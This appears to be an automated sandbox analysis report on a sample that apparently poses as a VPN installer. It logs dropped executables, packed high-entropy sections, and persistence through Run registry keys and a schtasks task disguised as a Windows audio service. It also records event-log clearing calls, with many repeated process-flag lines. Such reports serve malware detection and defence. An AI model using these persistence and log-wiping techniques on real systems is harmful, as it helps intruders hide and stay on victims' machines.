Source: 5ar6QsR4e.exe.2.dr	Static PE information: section name:
Source: 5ar6QsR4e.exe.2.dr	Static PE information: section name:
Source: 5ar6QsR4e.exe.2.dr	Static PE information: section name:
Source: 5ar6QsR4e.exe.2.dr	Static PE information: section name: .winlice
Source: 5ar6QsR4e.exe.2.dr	Static PE information: section name: .boot
Source: iusb3mon.exe.18.dr	Static PE information: section name:
Source: iusb3mon.exe.18.dr	Static PE information: section name:
Source: iusb3mon.exe.18.dr	Static PE information: section name:
Source: iusb3mon.exe.18.dr	Static PE information: section name:
Source: iusb3mon.exe.18.dr	Static PE information: section name:
Source: iusb3mon.exe.18.dr	Static PE information: section name: .winlice
Source: iusb3mon.exe.18.dr	Static PE information: section name: .boot

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018001C378 push rdx; ret	2_2_000000018001C381
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018001C388 push rdx; ret	2_2_000000018001C389
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFD340A19D8 pushad ; ret	12_2_00007FFD340A19E1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_04982D2D pushfd ; ret	20_2_04982D51
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_04F80C53 push edi; iretd	22_2_04F80C62
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 33_2_00CCAC91 push 482E30CCh; mov dword ptr [esp], edx	33_2_00E5F323
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 33_2_00CCAC91 push esi; mov dword ptr [esp], ebx	33_2_00E5F327
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 33_2_00CCAC91 push 15C38ED2h; mov dword ptr [esp], ebx	33_2_00E5F35D
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 33_2_00CCAC91 push 1D2E008Dh; mov dword ptr [esp], ebp	33_2_00E5F3BC
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 33_2_00CCAC91 push 084C25F2h; mov dword ptr [esp], edi	33_2_00E5F3DE
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 33_2_00C06074 push ecx; ret	33_2_00C06087
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 33_2_06CF9ED0 push eax; ret	33_2_06CF9EFE
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 33_2_06CF9E44 push eax; ret	33_2_06CF9E62
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 33_2_06D0E543 push ebp; retf	33_2_06D0E54C
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 33_2_06D0E548 push ebp; retf	33_2_06D0E54C
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 33_2_06D14073 push es; iretd	33_2_06D14074
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 33_2_06D14017 push ecx; iretd	33_2_06D14021
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 33_2_04ECA48F push eax; ret	33_2_04ECA4BD
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 33_2_04ECA403 push eax; ret	33_2_04ECA421
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 33_2_04EDDD9F push ss; ret	33_2_04EDDDA2
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 33_2_04EDDD63 push edx; ret	33_2_04EDDD66
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 33_2_04EDEB00 push ebp; retf	33_2_04EDEB0B

Source: 5ar6QsR4e.exe.2.dr	Static PE information: section name: entropy: 7.9814027289179394
Source: iusb3mon.exe.18.dr	Static PE information: section name: entropy: 7.9814027289179394

Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	File created: C:\ProgramData\Program\iusb3mon.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File created: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Jump to dropped file
Source: C:\Users\user\Desktop\KL-3.1.16.exe	File created: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\lua5.1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KL-3.1.16.exe	File created: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File created: C:\Program Files\product1\letsvpn-latest.exe	Jump to dropped file

Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe

File created: C:\ProgramData\Program\iusb3mon.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml

Source: C:\ProgramData\Program\iusb3mon.exe

33_2_06CF67CC

Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Microsoft
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Microsoft
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: 33_2_06D03F29 IsIconic,GetWindowPlacement,GetWindowRect,

33_2_06D03F29

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: 33_2_06CF3B39 OpenEventLogA,ClearEventLogA,CloseEventLog,

33_2_06CF3B39

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: 33_2_06CF838B CreateThread,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,

33_2_06CF838B

Source: C:\Users\user\Desktop\KL-3.1.16.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
